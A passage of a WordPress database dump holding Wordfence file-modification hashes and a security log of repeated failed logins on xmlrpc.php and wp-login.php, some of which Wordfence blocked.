,�S�','�/�A���y�Oٮ<e#3�w��,Ͻ�O','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('� 3��딎��ը�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��;�d�|��^�-�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�&E�!���`q�r�c','wp-content/themes/singularity/inc/functions-discussion-board.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�h���~Y���','cu��V�Ɯ+*�ۃd��N����	��j\nH�0T�','',0,'?'),('�0s�2�Y\"a�&��','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���Xs}��D�K�\0','�F\0A�5	I[�z��b̧�{���p�]�s�','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�0�w��t�Nl嬣','܂s�H�<�&�`�vЖX+v^=0�O]�?!�`','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('�U\\��㜕چ��z','wp-content/themes/brickyard/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t@;��1k��J˵7d','ä��Jm%k�J�֖^@�y�^\r�@�41\Z�L�o','',0,'?'),('�V)u={aW��3��kV�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������kU#��&<�','p	8M��0���?H�fM�����\0}v�K����','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ƛ�;��^\'��pD?�','�i��`)��\'B�O�踴ǹ�Z{�B�$D�87\0','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�d�a�n��{?�\0p','wp-content/themes/catch-flames/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"m����_�d�','I�8���P����4��:��I%���$�HC��.','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h�x��T�g�/x�','(� 	7D�T��M^�����f\0��v�E','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?�	�G�1','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('��A��k�bB�K��','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F}X��~e��9#���','P_=&߁���X�Z�ۉ���D��3�i���KM%','',0,'?'),('����ݫa�9�h�L��','wp-content/themes/chronus/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x���!ѩ;\ZF?sA+�','�Q܇���,s�L��%�9r�974i6������','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ�	�}��{~YB�v','',0,'?'),('��|�9*�?6}*�q{k}','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�`]�-����F��','��uH�VD��8���I1��N\"Ll�R�����','',0,'?'),('��{\"���3�SMIm�','wp-content/themes/the-best/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<�(}��2,��','B�7.����o�TQ\\<�sNk�U���\n�*(\r�','',0,'?'),('���2�=�j�ʽ��X','wp-content/themes/event/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�H�2�*e�Q�7��YC','4R-�$G�>�&I\\d)�,]�yp�G��}��','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('��2\n|�v4��0�ɓ','wp-content/themes/graphene/images/social/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`F\r#�y\n2�4^{�','�2��J��|�l�B�Qg�\0��WY���F','',0,'?'),('�&�e�79��*3�','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1].��&�S-b	�','��Dh�L�[�ʑLr��K�ܱF�Ӂ����\0�','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�C-��#���$��2��','wp-content/themes/chronus/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S�i�| �jɓ��','�e��!Y����q��t۹��:	����E','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�?.O��4�o��V֡','��f��ɲ��AE�u�k���L�t+KZ	�Ť�','',0,'?'),('�L�%�Sz����6$S�','wp-content/themes/hitmag/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('�X���?��^�.�s��','wp-content/themes/simpleshift/parts/companion/frontpage-action2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y_����N��d@C%��','8�6��P�ka/��>ОtG���p?�\05x��cA','',0,'?'),('�Zܧgݸ�d1W��','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/switch.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AT��\Z>�n�\'rw�,�','-2 }�\r^�#�k\Z����u�l��TV�. ','',0,'?'),('�]\"�@����ե%.�$','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���>T�If�jl�`','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('�e�(��p�k8�SS�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�,��L�S.�_��I','��a�.h�\0�� ��{Q���û�in&T�T��','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('���gv��%�E�','wp-content/themes/skt-pathway/images/hr_double.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`e�7���=��q�i','$��Ѝ��o���}�?�3\Z�+_�)��d�','',0,'?'),('��A}��z�%x�J�f��','wp-content/themes/chronus/assets/js/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S>�i�Y��Ӯ','5w�z�\'P\'��LC�ʪG�%>ܶ�\Z���\\','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('����\0��,=Cˌ�','wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Puē���P��7�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','�����–����%*�kb$�ZR��f�i�`�','',0,'?'),('��qM�pavB�.�z�\Z�','wp-content/themes/Endolf/sponsors.php',0,'w��W/�\"��','w��W/�\"��','�3Zӭ�(�\"k#\n[�{��\r=L+I#\rz�','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z�	h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('�Þ}:i��qKP���','wp-content/themes/Endolf/FT/js/colorset.js',0,'-�*Ј��`��_��','-�*Ј��`��_��','o�$�V�~,�e�qה2�$3���H�TZ���#�','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?'),('�㳜��p��F���','wp-content/themes/enigma/core/comment-function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q����Iu\ZP����c','������<Px�շ������j,��[�','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�W��:�.p�j[yyQ','v�6$�-���ȓ��k�Z��Op��]�\"�r5','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=7373 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (5445,0.000000,1628915837.097381,'\0\0\0\0\0\0\0\0\0\0��m��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5446,0.000000,1628916025.588110,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(5447,0.000000,1628916141.989349,'\0\0\0\0\0\0\0\0\0\0����0',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5448,0.000000,1628916471.634513,'\0\0\0\0\0\0\0\0\0\0���Y',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5449,0.000000,1628916791.086426,'\0\0\0\0\0\0\0\0\0\0���;�.',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5450,0.000000,1628917100.080619,'\0\0\0\0\0\0\0\0\0\0��H��s',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5451,0.000000,1628917291.241973,'\0\0\0\0\0\0\0\0\0\0���#t;',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','loginFailValidUsername',NULL,NULL),(5452,0.000000,1628917436.782719,'\0\0\0\0\0\0\0\0\0\0��.e�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5453,0.000000,1628917733.925108,'\0\0\0\0\0\0\0\0\0\0����/',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5454,0.000000,1628918083.028317,'\0\0\0\0\0\0\0\0\0\0��3Dp^',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5455,0.000000,1628918368.008994,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5456,0.000000,1628918542.072855,'\0\0\0\0\0\0\0\0\0\0�����3',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(5457,0.000000,1628918680.843533,'\0\0\0\0\0\0\0\0\0\0���\n�u',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5458,0.000000,1628918998.481785,'\0\0\0\0\0\0\0\0\0\0���kS�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5459,0.000000,1628919314.882701,'\0\0\0\0\0\0\0\0\0\0���R�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5460,0.000000,1628919668.413225,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5461,0.000000,1628919792.293448,'\0\0\0\0\0\0\0\0\0\0��=��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(5462,0.000000,1628919951.186939,'\0\0\0\0\0\0\0\0\0\0����r�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5463,0.000000,1628920271.431385,'\0\0\0\0\0\0\0\0\0\0����6p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5464,0.000000,1628920590.744893,'\0\0\0\0\0\0\0\0\0\0��{��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5465,0.000000,1628921239.514400,'\0\0\0\0\0\0\0\0\0\0����/',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5466,0.000000,1628921549.145910,'\0\0\0\0\0\0\0\0\0\0����zB',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5467,0.000000,1628921863.961168,'\0\0\0\0\0\0\0\0\0\0���֖]',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5468,0.000000,1628922314.739456,'\0\0\0\0\0\0\0\0\0\0����Qz',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5469,0.000000,1628922368.932051,'\0\0\0\0\0\0\0\0\0\0����%+',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5470,0.000000,1628922679.334689,'\0\0\0\0\0\0\0\0\0\0�����o',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5471,0.000000,1628923021.265126,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5472,0.000000,1628923354.195350,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5473,0.000000,1628923578.157023,'\0\0\0\0\0\0\0\0\0\0����Kj',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','loginFailValidUsername',NULL,NULL),(5474,0.000000,1628923659.142608,'\0\0\0\0\0\0\0\0\0\0���Ů�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5475,0.000000,1628923972.269112,'\0\0\0\0\0\0\0\0\0\0��P��F',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5476,0.000000,1628924287.697234,'\0\0\0\0\0\0\0\0\0\0��/�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5477,0.000000,1628924640.253305,'\0\0\0\0\0\0\0\0\0\0��MD~�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5478,0.000000,1628924855.227261,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailValidUsername',NULL,NULL),(5479,0.000000,1628924956.461635,'\0\0\0\0\0\0\0\0\0\0���q٤',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5480,0.000000,1628925250.111357,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5481,0.000000,1628925572.636428,'\0\0\0\0\0\0\0\0\0\0��`}��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5482,0.000000,1628925936.732411,'\0\0\0\0\0\0\0\0\0\0���q�t',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5483,0.000000,1628926118.330257,'\0\0\0\0\0\0\0\0\0\0���Y0',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5484,0.000000,1628926221.064015,'\0\0\0\0\0\0\0\0\0\0��g���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5485,0.000000,1628926867.359225,'\0\0\0\0\0\0\0\0\0\0��ár�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5486,0.000000,1628927220.371259,'\0\0\0\0\0\0\0\0\0\0��.��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5487,0.000000,1628927386.750962,'\0\0\0\0\0\0\0\0\0\0����U�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(5488,0.000000,1628927523.881707,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5489,0.000000,1628927845.692052,'\0\0\0\0\0\0\0\0\0\0���w',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 